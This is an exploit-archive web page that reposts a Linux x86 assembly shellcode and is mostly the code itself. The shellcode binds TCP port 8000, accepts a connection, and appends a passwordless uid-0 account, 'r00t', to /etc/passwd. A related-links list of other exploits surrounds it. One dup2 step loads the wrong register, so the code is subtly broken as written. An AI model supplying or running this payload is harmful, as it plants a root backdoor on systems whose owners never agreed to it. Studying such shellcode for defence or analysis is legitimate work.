首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 bindport 8000 & add user with root access 225+ bytes
来源:vfocus.net 作者:vfocus 发布时间:2009-06-10   
;
; Title	: Bindport TCP/8000 & execve add user with access root
; os	: Linux x86
; size	: 225+ bytes
; IP	: localhost
; Port	: 8000
; Use	: nc localhost 8000
;
; Author	: Jonathan Salwan
; Mail		: submit AT shell-storm.org
; Web		: http://www.shell-storm.org
;
;
; More shellcodes in => http://www.shell-storm.org/shellcode/
;

section .text
global _start

_start:
;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;;
push	byte	0x0
push	byte	0x1
push	byte	0x2

mov	eax, 	0x66
mov	ebx, 	0x1
mov	ecx, 	esp
int 	0x80
;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;;

mov 	edx, 	eax

;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;;
push	byte	0x0
push	byte	0x0
push	byte	0x0
push	word	0x401f
push	word	0x2
mov	ebx, 	esp

push 	byte	0x10
push	ebx
push	edx

mov	eax, 	0x66
mov	ebx, 	0x2
mov	ecx, 	esp
int 	0x80
;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;;
push	byte	0x1
push	edx

mov	eax,	0x66
mov	ebx,	0x4
mov	ecx, 	esp
int 	0x80
;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;;
push	byte	0x0
push	byte	0x0
push	edx

mov	eax, 	0x66
mov	ebx, 	0x5
mov	ecx, 	esp
int 	0x80
;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;;

mov	edx, 	eax

;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;;
mov	eax, 	0x3f
mov	ebx, 	edx
mov 	ebx, 	0x2
int	0x80

mov     eax, 	0x3f
mov     ebx, 	edx
mov     ecx, 	0x1
int     0x80

mov     eax, 	0x3f
mov     ebx, 	edx
mov     ecx, 	0x0
int     0x80
;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;;
push 	byte 	0x05
pop 	eax
xor 	ecx, 	ecx
push 	ecx
push 	0x64777373
push 	0x61702f2f
push 	0x6374652f
mov 	ebx, 	esp
mov 	cx, 	02001Q
int	0x80
;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;;

mov 	ebx, 	eax

;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;;
push 	byte 	0x04
pop 	eax
xor 	edx, 	edx
push 	edx

push	word	0x6873
push	0x61622f6e
push	0x69622f3a
push	0x746f6f72
push	0x2f3a746f
push	0x6f723a30
push	0x3a303a3a
push	0x74303072
mov 	ecx, 	esp
push 	byte 0x1f
pop 	edx
int 	0x80
;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;;
push 	byte 	0x06
pop 	eax
int 	0x80
;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;;

push 	byte 0x01
pop	eax
int 	0x80

; [2009-06-08]
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·linux/x86 bindport 8000 & exec
·VT-Auth 1.0 (zHk8dEes3.txt) Fi
·MyCars Automotive (Auth Bypass
·fipsCMS Light 2.1 (db.mdb) Rem
·Joomla Component com_school 1.
·Virtue Classifieds (category)
·Virtue Book Store (cid) Remote
·Virtue Shopping Mall (cid) Rem
·Interlogy Profile Manager Basi
·Kjtechforce mailman b1 (dest)
·Apple MACOS X xnu <= 1228.9.59
·PeaZIP <= 2.6.1 Compressed Fil
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved